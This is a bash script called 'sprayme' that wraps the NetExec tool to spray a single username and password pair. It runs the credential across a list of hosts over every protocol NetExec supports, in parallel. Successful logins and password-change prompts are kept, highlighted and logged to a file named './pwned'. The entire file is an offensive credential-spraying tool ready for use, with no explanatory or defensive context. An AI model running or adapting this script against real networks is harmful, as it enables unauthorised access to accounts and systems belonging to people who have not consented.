#!/usr/bin/env bash
set -euo pipefail
if (( $# != 2 )); then
  echo "[*] Usage: sprayme 'USERNAME:PASSWORD' <HOSTS_FILE>" >&2
  exit 1
fi
up="$1"
H="$2"
if [[ ! -e "$H" ]]; then
  echo "[-] ERROR: The file containing the hosts is invalid: $H" >&2
  exit 1
fi
if [[ "$up" != *:* ]]; then
  echo "[-] ERROR: The credentials must be in the form of 'USERNAME:PASSWORD'" >&2
  exit 1
fi
IFS=':' read -r U P <<< "$up"
if [[ -z "$U" || -z "$P" ]]; then
  echo "[-] ERROR: The username and/or password must not be empty." >&2
  exit 1
fi
mapfile -t protos < <(nxc -h 2>&1 | grep -oP '\{[^}]+\}' | head -n1 | tr -d '{}' | tr ',' '\n' | sed 's/^[[:space:]]*//;s/[[:space:]]*$//')
for p in "${protos[@]}"; do
  (nxc "$p" "$H" -u "$U" -p "$P" --continue-on-success -t 20 --no-progress --timeout 8 --dns-timeout 8 | grep -a --line-buffered -oP '\d{1,3}(?:\.\d{1,3}){3}\s+\d+\s+\S+\s.*\\\S.*' | sed -E '/\[\+\]|CHANGE/ { s/(\\)([^:]+:[^ ].*)/\1\x1b[1;33m\2\x1b[0m/; /\x1b\[1;33m/!d }' | grep --color=always -P '\x1b\[1;33m.*\x1b\[0m' | tee -a ./pwned &)
done
wait
